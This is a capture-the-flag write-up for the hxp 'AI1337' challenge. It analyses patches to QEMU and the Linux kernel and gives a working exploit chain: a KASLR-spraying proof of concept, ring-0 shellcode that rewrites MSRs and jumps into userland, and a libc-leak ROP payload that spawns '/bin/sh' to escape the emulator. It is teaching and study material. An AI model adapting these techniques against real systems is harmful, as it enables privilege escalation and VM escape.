Tags: x86-64 pwn qemu kernel amd64
Rating:
author: 0x6fe1be2
Description:
You have the great pleasure of sampling our HXP HACK-4 AI1337 processor - an intersection of Security and AI.
Like it? We have many in the pipeline! -- sisu
The challenge consists of a modified QEMU binary that adds new instructions to the existing x86-64 set, notably MTS (copy bytes from memory into scratch memory) and STM (copy bytes from scratch memory back to memory), which are unprivileged, and SCRHLW (update the scratch memory base VA), which is privileged.
Additionally, two MSRs (Model Specific Registers) were added: MSR_HACK4_SLICE_SIZE (default 0x400) and MSR_HACK4_NUM_SLICES (default 33).
The privileged SCRHLW instruction can be accessed through a patched-in prctl option, PR_SET_SCRATCH_HOLE, inside the Linux kernel and seems to directly update the TLB (Translation Lookaside Buffer), which we can exploit: we abuse SCRHLW to inject CPL0 shellcode.
Let's give a brief overview of the challenge components.
hxp_silicon_foundaries_hack4-7786be6f6ac42883.tar.xz
.
└── hxp_silicon_foundaries_hack4
    ├── Dockerfile
    ├── bzImage
    ├── compose.yml
    ├── example_program
    │   ├── ai.s
    │   ├── build.sh
    │   └── main.c
    ├── flag.txt
    ├── hxp_ai1337.pdf
    ├── initramfs.cpio
    ├── launch_vm.sh
    ├── linux_build
    │   └── 0001-Add-PR_SET_SCRATCH_HOLE.patch
    ├── pow-solver
    ├── pow-solver.cpp
    ├── qemu_build
    │   ├── 0001-Add-hack4-ai1337.patch
    │   ├── Dockerfile
    │   └── build_package
    │       ├── bios-256k.bin
    │       ├── efi-e1000.rom
    │       ├── kvmvapic.bin
    │       ├── linuxboot_dma.bin
    │       └── qemu_system_x86_64_ai1337
    └── ynetd
The challenge creators were nice enough to give us basically all the files necessary for deploying the challenge. This is mostly interesting when exploiting the QEMU binary, as that is pretty similar to userland exploitation, and knowing the correct libraries through the Dockerfile will be helpful.
We can also see that the flag is not inside the VM, telling us that we will have to escape QEMU if we want to get it.
Now let's look at the more interesting files:
The kernel-related files seem to be rather standard: we have an initramfs.cpio which contains our filesystem (Note: kernel challenges normally don't bother booting into e.g. an XFS rootfs and just stay inside the initramfs) and a kernel bzImage (which seems to be 6.12.1).
We have also been given a kernel patch file, which seems to add a new prctl option called PR_SET_SCRATCH_HOLE and seems to execute a "new" assembly instruction, SCRHLW, which has been added through QEMU.
0001-Add-PR_SET_SCRATCH_HOLE.patch
Even though the Linux kernel doesn't seem to have a deliberate vulnerability, it will be important because we start out as an unprivileged user. QEMU exploits usually require CPL0 (Ring 0) access, which we should keep in mind.
QEMU seems to be the focus of this challenge. We are given a patched binary qemu_system_x86_64_ai1337 and a patch file which we will have to analyse, because it's probably where the vulnerability lies.
0001-Add-hack4-ai1337.patch
Luckily for us, we have also been given an assembly file that provides stubs for interacting with the custom instructions.
ai.s
Last but not least, we have the command used for starting the VM. One important thing to notice is that neither smap nor smep is enabled, allowing us to write a second-stage payload directly in userland and jump to it without first having to disable them through CR4.
launch_vm.sh
We have also been given a device specification in the form of a .pdf (hxp_silicon_foundaries_hack4/hxp_ai1337.pdf) and an .rst file, which explains a number of instructions and MSRs that have been added through QEMU and will be the target of our exploit:
Instructions:
Opcode | Instruction | Description |
---|---|---|
0F 0A 83 | MTS | Load RCX bytes from memory address (RSI) to slice (RBX) at slice offset (RDI) |
0F 0A 84 | STM | Read RCX bytes from slice (RBX) at slice offset (RDI) and write memory address (RSI) |
0F 0A 85 | FSCR | Clear all slices |
0F 0A 86 | SCRADD | Add the slices pointed by RDI and RSI, and store the result into slice pointed by RDX |
0F 0A 87 | SCRSUB | Subtract the slices pointed by RDI and RSI, and store the result into slice pointed by RDX |
0F 0A 88 | SCRMUL | Multiply the slices pointed by RDI and RSI, and store the result into slice pointed by RDX |
0F 0A 89 | SCRHLW (privileged) | Update scratch memory PSCHORR bi-ATS base VA |
0F 0A 8A | SCRHLR | Read scratch memory PSCHORR bi-ATS base VA |
MSRs:
MSR | Identifier | Description |
---|---|---|
MSR_HACK4_SLICE_SIZE | 0xC0000105 | Read/Write slice size in the AI1337 engine |
MSR_HACK4_NUM_SLICES | 0xC0000106 | Read/Write count of slices in the AI1337 engine |
We also receive multiple ASCII diagrams notably this one, which is going to be relevant for our exploit.
[ASCII diagram: the left column, Physical Memory, lists 0, IO space, RAM and the AI1337 aperture; the right column is Virtual Memory. The AI1337 aperture is connected over the PSCHORR Interconnect to the bi-ATS, which sits on the virtual memory side next to Direct Addressing.]
I'm using the following tools for writing and testing my exploit:
Let's start with writing our exploit:
As teased before, there seem to be vulnerabilities in the implementation of the x86-64 extension called AI1337. Let's have a closer look at the patches.
First, some constants are defined which will be relevant for the patch.
target/i386/ops_ai1337.h
#define AI1337_SCRATCH_SIZE (33ULL * 1024)
#define AI1337_SCRATCH_MAX_NUM_SLICES (128)
#define AI1337_SCRATCH_SLICE_SIZE_DEFAULT (1024ULL)
#define AI1337_SCRATCH_NUM_SLICES_DEFAULT (33UL)
#define AI1337_SCRATCH_MAX_SLICE_SIZE (4096ULL)
Then the new state is initialised directly in the CPU. Note that a stack array scratch[AI1337_SCRATCH_SIZE] is used as the backing store for our scratch operations. It seems like this won't be able to hold AI1337_SCRATCH_MAX_NUM_SLICES * AI1337_SCRATCH_MAX_SLICE_SIZE bytes (foreshadowing).
target/i386/cpu.c
...
env->scratch_config.num_active_slices = AI1337_SCRATCH_NUM_SLICES_DEFAULT;
env->scratch_config.slice_size = AI1337_SCRATCH_SLICE_SIZE_DEFAULT;
env->scratch_config.va_base = AI1337_SCRATCH_VA_BASE;
env->scratch_config.phys_base = AI1337_SCRATCH_PHYS_BASE;
env->scratch_config.access_enabled = 0;
uint16_t scratch[AI1337_SCRATCH_SIZE];
env->scratch_region = malloc(sizeof(MemoryRegion));
memset(env->scratch_region, 0, sizeof(*env->scratch_region));
memory_region_init_ram_ptr(env->scratch_region, NULL, "ai1337-scratch", AI1337_SCRATCH_SIZE, scratch);
env->scratch_region->ram_block->flags |= RAM_RESIZEABLE;
env->scratch_region->ram_block->max_length = AI1337_SCRATCH_MAX_NUM_SLICES * AI1337_SCRATCH_MAX_SLICE_SIZE;
memory_region_add_subregion(get_system_memory(), AI1337_SCRATCH_PHYS_BASE, env->scratch_region);
...
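To put numbers on the foreshadowing, here is a small sketch that recomputes the relevant sizes from the constants above. It assumes the `uint16_t scratch[AI1337_SCRATCH_SIZE]` declaration in the excerpt is accurate; the helper names (`backing_bytes`, `region_bytes`, `max_region_bytes`, `print_scratch_sizes`) are made up for illustration and are not part of the patch.

```c
#include <stdint.h>
#include <stdio.h>

/* Constants copied from target/i386/ops_ai1337.h in the patch. */
#define AI1337_SCRATCH_SIZE           (33ULL * 1024)
#define AI1337_SCRATCH_MAX_NUM_SLICES (128)
#define AI1337_SCRATCH_MAX_SLICE_SIZE (4096ULL)

/* Bytes that really back the region: the array elements are uint16_t. */
static uint64_t backing_bytes(void)
{
    return sizeof(uint16_t) * AI1337_SCRATCH_SIZE;
}

/* Size handed to memory_region_init_ram_ptr() at init time. */
static uint64_t region_bytes(void)
{
    return AI1337_SCRATCH_SIZE;
}

/* Largest size that the two MSRs are allowed to request. */
static uint64_t max_region_bytes(void)
{
    return AI1337_SCRATCH_MAX_NUM_SLICES * AI1337_SCRATCH_MAX_SLICE_SIZE;
}

/* Hypothetical helper: print the three sizes side by side. */
void print_scratch_sizes(void)
{
    printf("backing array : 0x%llx bytes\n", (unsigned long long)backing_bytes());
    printf("initial region: 0x%llx bytes\n", (unsigned long long)region_bytes());
    printf("max region    : 0x%llx bytes\n", (unsigned long long)max_region_bytes());
}
```

Under these assumptions the backing array is 0x10800 bytes while the MSRs can grow the region up to 0x80000 bytes, so anything past 0x10800 would land outside the array.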
When we write the MSRs, the values inside the CPU config change directly and the memory region is resized, but the backing buffer behind scratch_region is never reallocated, which should lead to an OOB access. Sadly, we can only write MSRs in CPL0, which isn't possible as an unprivileged user.
target/i386/tcg/sysemu/misc_helper.c
...
static bool helper_recalculate_scratch(CPUX86State *env, uint32_t new_num_slices, uint32_t new_slice_size)
{
    if (new_num_slices > AI1337_SCRATCH_MAX_NUM_SLICES) {
        return false;
    }
    if (new_slice_size > AI1337_SCRATCH_MAX_SLICE_SIZE) {
        return false;
    }
    uint32_t new_size = new_num_slices * new_slice_size;
    Error *err = NULL;
    bql_lock();
    memory_region_ram_resize(env->scratch_region, new_size, &err);
    bql_unlock();
    if (err) {
        return false;
    }
    env->scratch_config.num_active_slices = new_num_slices;
    env->scratch_config.slice_size = new_slice_size;
    return true;
}
void helper_wrmsr(CPUX86State *env)
...
    case MSR_HACK4_SLICE_SIZE:
        const uint32_t new_slice_size = val;
        if (!helper_recalculate_scratch(env, env->scratch_config.num_active_slices, new_slice_size)) {
            goto error;
        }
        break;
    case MSR_HACK4_NUM_SLICES:
        const uint32_t new_num_active_slices = val;
        if (!helper_recalculate_scratch(env, new_num_active_slices, env->scratch_config.slice_size)) {
            goto error;
        }
        break;
...
void helper_rdmsr(CPUX86State *env)
...
    case MSR_HACK4_SLICE_SIZE:
        val = env->scratch_config.slice_size;
        break;
    case MSR_HACK4_NUM_SLICES:
        val = env->scratch_config.num_active_slices;
        break;
...
And yeah, it looks like we have an OOB when writing to or reading from the scratch_region after editing the MSRs.
target/i386/tcg/translate.c
...
static void gen_mts_8(DisasContext *s, MemOp ot)
{
    const size_t slice_size_offset = offsetof(CPUX86State, scratch_config.slice_size);
    const size_t va_base_offset = offsetof(CPUX86State, scratch_config.va_base);
    const size_t access_offset = offsetof(CPUX86State, scratch_config.access_enabled);
    const TCGv slice_index = cpu_regs[R_EBX];
    const TCGv offset_in_slice = cpu_regs[R_EDI];
    const TCGv memory_address = cpu_regs[R_ESI];
    const TCGv dshift = gen_compute_Dshift(s, ot);
    tcg_gen_st_tl(tcg_constant_i64(1), tcg_env, access_offset);
    // load from memory address
    gen_lea_v_seg(s, memory_address, R_DS, -1);
    gen_op_ld_v(s, MO_8, s->T0, s->A0);
    // Calculate address for scratch
    // A0 = offset_in_slice + slice_base + (slice_index * slice_size)
    tcg_gen_ld_tl(s->A0, tcg_env, va_base_offset);
    gen_lea_v_seg(s, s->A0, R_ES, -1);
    tcg_gen_add_tl(s->A0, s->A0, offset_in_slice);
    tcg_gen_ld32u_tl(s->tmp0, tcg_env, slice_size_offset);
    tcg_gen_mul_tl(s->tmp0, s->tmp0, slice_index);
    tcg_gen_add_tl(s->A0, s->A0, s->tmp0);
    // Store value
    gen_op_st_v(s, MO_8, s->T0, s->A0);
    gen_op_add_reg(s, s->aflag, R_ESI, dshift);
    gen_op_add_reg(s, s->aflag, R_EDI, dshift);
    tcg_gen_st_tl(tcg_constant_i64(0), tcg_env, access_offset);
}
static void gen_stm_8(DisasContext *s, MemOp ot)
{
    ...
    // similar to gen_mts_8
    ...
}
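The address arithmetic in gen_mts_8 can be modelled in a few lines of plain C. This is only a sketch: `scratch_target` is a made-up name, and it assumes the ES segment base added by gen_lea_v_seg is zero, as it normally is in 64-bit mode.

```c
#include <stdint.h>

/*
 * Models the target address computed by gen_mts_8:
 *   A0 = va_base + offset_in_slice + slice_index * slice_size
 * slice_size is loaded as an unsigned 32-bit value, everything else is
 * 64-bit and wraps around. The excerpt shows no bounds check on
 * slice_index or offset_in_slice.
 */
static uint64_t scratch_target(uint64_t va_base, uint32_t slice_size,
                               uint64_t slice_index, uint64_t offset_in_slice)
{
    return va_base + offset_in_slice + (uint64_t)slice_size * slice_index;
}
```

With the default slice size of 0x400, a slice index of -1 resolves to an address 0x400 bytes below the base, i.e. outside the scratch window, so the store faults. Because `access_enabled` is set to 1 before the store and only cleared after it, a fault on that store would plausibly leave the flag set; this is an inference from the excerpt, not something the patch states.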
Finally, let's have a look at the inner workings of SCRHLW.
target/i386/tcg/emit.c.inc
static void gen_SCRHLW(DisasContext *s, X86DecodedInsn *decode)
{
    if (CPL(s) != 0)
    {
        gen_illegal_opcode(s);
        return;
    }
    size_t va_base_offset = offsetof(CPUX86State, scratch_config.va_base);
    tcg_gen_st_tl(cpu_regs[R_EDI], tcg_env, va_base_offset);
}
And we notice that this unsafely sets the base address that is later used to fill the TLB, which we can exploit. This seems to implement the functionality described in the diagram before: notably, our scratch_region is made directly accessible through virtual memory using the TLB.
target/i386/tcg/sysemu/excp_helper.c
...
bool x86_cpu_tlb_fill(CPUState *cs, vaddr addr, int size,
                      MMUAccessType access_type, int mmu_idx,
                      bool probe, uintptr_t retaddr)
...
    if (env->scratch_config.access_enabled &&
        (addr >= env->scratch_config.va_base) &&
        ((addr + size) <= (env->scratch_config.va_base + x86_calculate_scratch_size(env)))) {
        vaddr paddr = env->scratch_config.phys_base + (addr - env->scratch_config.va_base);
        tlb_set_page_with_attrs(cs, addr & TARGET_PAGE_MASK,
                                paddr & TARGET_PAGE_MASK,
                                cpu_get_mem_attrs(env),
                                PAGE_READ | PAGE_WRITE | PAGE_EXEC, mmu_idx, TARGET_PAGE_SIZE);
        return true;
    }
...
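The hook above boils down to a range check followed by a linear translation. The sketch below models just that decision. The struct and function names are hypothetical, `scratch_size` stands in for `x86_calculate_scratch_size(env)` (assumed to be num_active_slices * slice_size), and 4 KiB pages are assumed for TARGET_PAGE_MASK.

```c
#include <stdbool.h>
#include <stdint.h>

#define PAGE_MASK_4K (~0xfffULL) /* assumed TARGET_PAGE_MASK for 4 KiB pages */

/* Hypothetical mirror of the fields the hook reads from scratch_config. */
typedef struct {
    bool     access_enabled;
    uint64_t va_base;
    uint64_t phys_base;
    uint64_t scratch_size; /* assumed: num_active_slices * slice_size */
} scratch_cfg;

/*
 * Returns true and stores the page-aligned physical address in *paddr_page
 * if the hook would install a read/write/exec mapping for this access.
 * Note what is absent: no CPL check and no page-table walk.
 */
static bool scratch_tlb_hit(const scratch_cfg *c, uint64_t addr, int size,
                            uint64_t *paddr_page)
{
    if (!c->access_enabled || addr < c->va_base ||
        addr + (uint64_t)size > c->va_base + c->scratch_size) {
        return false;
    }
    *paddr_page = (c->phys_base + (addr - c->va_base)) & PAGE_MASK_4K;
    return true;
}
```

If va_base points into kernel text and the flag is set, any access in that window that misses the TLB, including a kernel instruction fetch, would be redirected to scratch memory under this model.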
Sadly, SCRHLW is only accessible in CPL0, but luckily for us the kernel was patched to give us access through prctl.
include/uapi/linux/prctl.h
...
#define PR_SET_SCRATCH_HOLE 0x53534352
...
kernel/sys.c
static noinstr int prctl_set_scratch_hole(unsigned long opt, unsigned long addr,
                                          unsigned long size, unsigned long arg)
{
    const u64 new_scratch_hole = opt;
    if ((new_scratch_hole & 0xFFFUL) != 0U) {
        return -EINVAL;
    }
    if (new_scratch_hole < mmap_min_addr) {
        return -EINVAL;
    }
    asm volatile(
        "mov %0, %%rdi\n\t"
        ".byte 0x0f; .byte 0x0a; .byte 0x89\n\t" // scrhlw
        :
        : "r"(new_scratch_hole)
        : "rdi", "memory"
    );
    return 0;
}
...
SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned long, arg3,
                unsigned long, arg4, unsigned long, arg5)
...
    case PR_SET_SCRATCH_HOLE:
        error = prctl_set_scratch_hole(arg2, arg3, arg4, arg5);
        break;
...
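The validation in prctl_set_scratch_hole is short enough to restate as a predicate. In the sketch below, `scratch_hole_accepted` is a made-up name and the mmap_min_addr value of 0x10000 used in the usage note is an assumption (it is a common default, but the challenge kernel's value was not checked).

```c
#include <stdbool.h>
#include <stdint.h>

/*
 * Restates the two checks from the kernel patch: the address must be
 * page aligned and must not be below mmap_min_addr. There is no upper
 * bound, so nothing restricts the value to userspace addresses.
 */
static bool scratch_hole_accepted(uint64_t new_scratch_hole,
                                  uint64_t mmap_min_addr)
{
    if ((new_scratch_hole & 0xFFFULL) != 0) {
        return false;
    }
    if (new_scratch_hole < mmap_min_addr) {
        return false;
    }
    return true;
}
```

With mmap_min_addr assumed to be 0x10000, both the userland trampoline 0x6fe1be2000 and a kernel text address such as 0xffffffff81000000 pass, while an unaligned or very low address is rejected.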
So how do we exploit an unsafe TLB update? Basically, it allows us to corrupt any virtual memory mapping we want (even CPL0 ones), as long as there is no existing TLB entry (this is an important consideration).
Also, luckily for us, KASLR is notoriously weak and only 16bit (kaslr.c), which is realistically brute-forcible with a non-crashing spray, which we have.
So we create a simple PoC that sprays NOPs (0x90) and see if we can trigger a fault inside the kernel.
#define START_SEARCH 0xffffffff80000000
#define END_SEARCH 0xfffffffffff00000
int main(int argc, char *argv[]) {
    lstage("INIT");
    // cyclic_cpy(spray, 0x1000);
    rlimit_increase(RLIMIT_NOFILE);
    pin_cpu(0, 0);
    // Gather info about scratch memory
    scratch_info info = {0};
    get_scratch_info(&info);
    linfo("Scratch info:");
    linfo(" - scratch addr: 0x%lx", info.scratch_addr);
    linfo(" - scratch default size: 0x%lx bytes", info.scratch_default_size);
    linfo(" - scratch max slice size: 0x%x bytes", info.scratch_max_slice_size);
    linfo(" - scratch max slice count: %u", info.scratch_max_slice_count);
    linfo("PSCHORR bi-ATS base VA: %p", read_ats_base());
    lstage("START");
    size_t slice_size_value = 0x400;
    size_t *trampolin = (size_t*) 0x6fe1be2000;
    char package[0x8000];
    memset(package, 0x90, sizeof(package)); // spray NOPs (0x90)
    memcpy(&package[sizeof(package) - sizeof(pivot)], pivot, sizeof(pivot));
    SYSCHK(prctl(PR_SET_SCRATCH_HOLE, trampolin));
    // fill the scratch memory slice by slice
    for (size_t i = 0; i < sizeof(package) / 0x400; i++) {
        load_scratch(i, 0, &package[i * slice_size_value], slice_size_value);
    }
    pid_t pid = fork();
    if (pid == 0) {
        linfo("crash and corrupt CPL0 TLB: %p", payload);
        load_scratch(-1, 0, "X", 1); // segfault
    }
    wait(NULL); // clear TLB allowing injection
    linfo("spray kaslr");
    for (trampolin = (size_t*) (START_SEARCH);
         (size_t) trampolin < END_SEARCH; trampolin += 0x100000 / sizeof(size_t)) {
        // linfo("spray aslr: %p", trampolin);
        SYSCHK(prctl(PR_SET_SCRATCH_HOLE, trampolin));
        if (((size_t) trampolin & 0xfffffff) == 0)
            linfo("spray aslr: %p", trampolin);
        // flush TLB
        pid_t pid = fork();
        if (pid == 0)
            load_scratch(-1, 0, "X", 1);
        wait(NULL);
    }
    putchar('\n');
    lstage("END");
}
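To get a feeling for the cost of the spray, the following sketch counts how many base addresses the loop above visits. The constants are taken from the PoC; `SPRAY_STEP` and `spray_candidates` are names introduced here for illustration.

```c
#include <stdint.h>

#define START_SEARCH 0xffffffff80000000ULL
#define END_SEARCH   0xfffffffffff00000ULL
#define SPRAY_STEP   0x100000ULL /* 1 MiB stride, as in the PoC loop */

/* Counts the iterations of the PoC's spray loop. */
static uint64_t spray_candidates(void)
{
    uint64_t n = 0;
    for (uint64_t va = START_SEARCH; va < END_SEARCH; va += SPRAY_STEP) {
        n++;
    }
    return n;
}
```

That is 2047 candidates, each costing one prctl call plus a fork and wait, which is cheap enough to run through in a single boot.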
Running the PoC, we luckily get the following oops, which indicates that our NOP-sled spray worked and that the kernel then tried to execute the zero bytes behind it.
[ 3.646252] Call Trace:
[ 3.646354] <TASK>
[ 3.655379] Oops: general protection fault, probably for non-canonical address 0x257830203a731fb1: 0000 [#23] PREEMPT SMP NOPTI
[ 3.655877] CPU: 0 UID: 1000 PID: 57 Comm: pwn Not tainted 6.12.1 #2
[ 3.656141] RIP: 0010:0xffffffff81008000
[ 3.656332] Code: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 <00> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 3.657072] RSP: 0018:ffffc90000114800 EFLAGS: 00010007
[ 3.657284] RAX: 257830203a731fb1 RBX: 48c35b02760100c5 RCX: 0000000000000000
[ 3.657546] RDX: 0000000000000000 RSI: 00000000ffffffea RDI: 48c35b02760100c5
[ 3.657791] RBP: ffffc900001149c8 R08: ffffffff81c95968 R09: 00000000ffffefff
[ 3.658058] R10: ffffffff81c25980 R11: ffffffff81c7d980 R12: 48c35b02760100c5
[ 3.658323] R13: ffffc90000114900 R14: ffffc900001149c8 R15: ffffffff81ac882d
[ 3.658584] FS: 000000000040c878(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[ 3.658871] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 3.659078] CR2: 257830203a731fb1 CR3: 00000000028b4000 CR4: 00000000000006b0
[ 3.659330] Call Trace:
[ 3.659457] <TASK>
[ 3.668313] Oops: general protection fault, probably for non-canonical address 0x257830203a732031: 0000 [#24] PREEMPT SMP NOPTI
[ 3.668793] CPU: 0 UID: 1000 PID: 57 Comm: pwn Not tainted 6.12.1 #2
[ 3.669052] RIP: 0010:0xffffffff81008000
So next we need to create some CPL0 Shellcode.
Let's start out simple and just overwrite the MSRs with the respective max values and to our luck it works.
crpt_msr.S
; nasm -f bin ./crpt_msr.S && xxd -i crpt_msr > crpt_msr.h
MSR_HACK4_SLICE_SIZE equ 0xc0000105
MSR_HACK4_NUM_SLICES equ 0xc0000106
BITS 64
xor rdx, rdx
mov rax, 0x1000
mov ecx, MSR_HACK4_SLICE_SIZE
wrmsr
mov rax, 128
mov ecx, MSR_HACK4_NUM_SLICES
wrmsr
int3
crpt_msr.h
unsigned char crpt_msr[] = {
0x48, 0x31, 0xd2, 0xb8, 0x00, 0x10, 0x00, 0x00, 0xb9, 0x05, 0x01, 0x00,
0xc0, 0x0f, 0x30, 0xb8, 0x80, 0x00, 0x00, 0x00, 0xb9, 0x06, 0x01, 0x00,
0xc0, 0x0f, 0x30, 0xcc
};
unsigned int crpt_msr_len = 28;
...
char package[0x8000];
memset(package, 0x90, sizeof(package));
memcpy(&package[sizeof(package) - sizeof(crpt_msr)], crpt_msr, sizeof(crpt_msr));
...
Now we need to somehow continue our exploit. As mentioned before, neither smap nor smep is enabled, allowing us to jump directly back into userspace code, so let's do that.
pivot.S
; nasm -f bin ./pivot.S && xxd -i pivot > pivot.h
MSR_HACK4_SLICE_SIZE equ 0xc0000105
MSR_HACK4_NUM_SLICES equ 0xc0000106
BITS 64
xor rdx, rdx
mov rax, 0x1000
mov ecx, MSR_HACK4_SLICE_SIZE
wrmsr
mov rax, 128
mov ecx, MSR_HACK4_NUM_SLICES
wrmsr
scasb
mov r15, 0x1111111111111111
call r15
pivot.h
unsigned char pivot[] = {
0x48, 0x31, 0xd2, 0xb8, 0x00, 0x10, 0x00, 0x00, 0xb9, 0x05, 0x01, 0x00,
0xc0, 0x0f, 0x30, 0xb8, 0x80, 0x00, 0x00, 0x00, 0xb9, 0x06, 0x01, 0x00,
0xc0, 0x0f, 0x30, 0xae, 0x49, 0xbf, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11,
0x11, 0x11, 0x41, 0xff, 0xd7
};
unsigned int pivot_len = 41;
...
void payload() {
    asm("int3");
}
...
size_t* p = memmem(pivot, sizeof(pivot), "\x11\x11\x11\x11\x11\x11\x11\x11", 8);
if (p != NULL)
    *p = (size_t) &payload;
...
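The placeholder patching can also be done without memmem (a GNU extension) and without an unaligned size_t store. The following is a minimal sketch of that idea; `patch_placeholder` is a hypothetical helper, not part of the original exploit.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Finds the first run of eight 0x11 bytes in buf and overwrites it with
 * target in little-endian byte order (what x86-64 expects for the
 * immediate of `mov r15, imm64`). Returns 1 if patched, 0 if not found.
 */
static int patch_placeholder(unsigned char *buf, size_t len, uint64_t target)
{
    static const unsigned char marker[8] = {
        0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11
    };
    for (size_t i = 0; i + sizeof(marker) <= len; i++) {
        if (memcmp(buf + i, marker, sizeof(marker)) == 0) {
            for (size_t k = 0; k < sizeof(marker); k++) {
                buf[i + k] = (unsigned char)(target >> (8 * k));
            }
            return 1;
        }
    }
    return 0;
}
```

In the exploit this would be called as `patch_placeholder(pivot, sizeof(pivot), (uint64_t)&payload)` before the shellcode is copied into the spray package.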
AND IT WORKS!
After corrupting the MSRs to achieve OOB we can simply get memory leaks inside QEMU and then use that information to drop a shell and read the flag.
#define BOF_IDX 16
#define BOF_OFFSET 0x800
void payload() {
    char leak[0x400];
    read_scratch(BOF_IDX, BOF_OFFSET, leak, sizeof(leak));
    size_t offset = 0x3d8;
    size_t libc = *(size_t*)&leak[0x378] - 0x11b9e1;
    load_scratch(0, 0, &me, 8);
    load_scratch(0, 8, &libc, 8);
    size_t bof_size = sizeof(leak) - offset;
    char* bof = leak + offset;
    bzero(bof, bof_size);
    ((size_t*)bof)[0] = libc + 0x10f75b+1; // ret
    ((size_t*)bof)[1] = libc + 0x10f75b; // pop rdi; ret
    ((size_t*)bof)[2] = libc + 0x1cb42f; // "/bin/sh"
    ((size_t*)bof)[3] = libc + 0x58740; // system
    load_scratch(BOF_IDX, BOF_OFFSET + offset, bof, bof_size);
    for(;;);
}
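Two pieces of arithmetic in this payload are worth spelling out: where (BOF_IDX, BOF_OFFSET) points once the slice size is 0x1000, and how the four-entry ROP chain is laid out. The sketch below reuses the offsets from the payload; `SLICE_SIZE`, `bof_byte_offset` and `build_chain` are names introduced here, and the libc offsets only fit the libc build used by the challenge.

```c
#include <stddef.h>
#include <stdint.h>

#define BOF_IDX    16
#define BOF_OFFSET 0x800
#define SLICE_SIZE 0x1000 /* value the shellcode writes to MSR_HACK4_SLICE_SIZE */

/* Byte offset from the start of the scratch buffer for (BOF_IDX, BOF_OFFSET). */
static size_t bof_byte_offset(void)
{
    return (size_t)BOF_IDX * SLICE_SIZE + BOF_OFFSET;
}

/* Fills the chain exactly as the payload does, given a leaked libc base. */
static void build_chain(uint64_t libc, uint64_t chain[4])
{
    chain[0] = libc + 0x10f75b + 1; /* ret: pop rdi is one byte, so +1 is its ret */
    chain[1] = libc + 0x10f75b;     /* pop rdi; ret */
    chain[2] = libc + 0x1cb42f;     /* "/bin/sh" */
    chain[3] = libc + 0x58740;      /* system */
}
```

The resulting offset is 0x10800, which equals sizeof(uint16_t) * 33 * 1024, so if the array declaration shown earlier is accurate, the leak starts right behind the end of the stack array.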
pwn.c
FLAG: hxp{tH1s_1s_th3_AI_$$$s3Ri3$$$_n0t_tH3_s3CuR3_s3R1eS}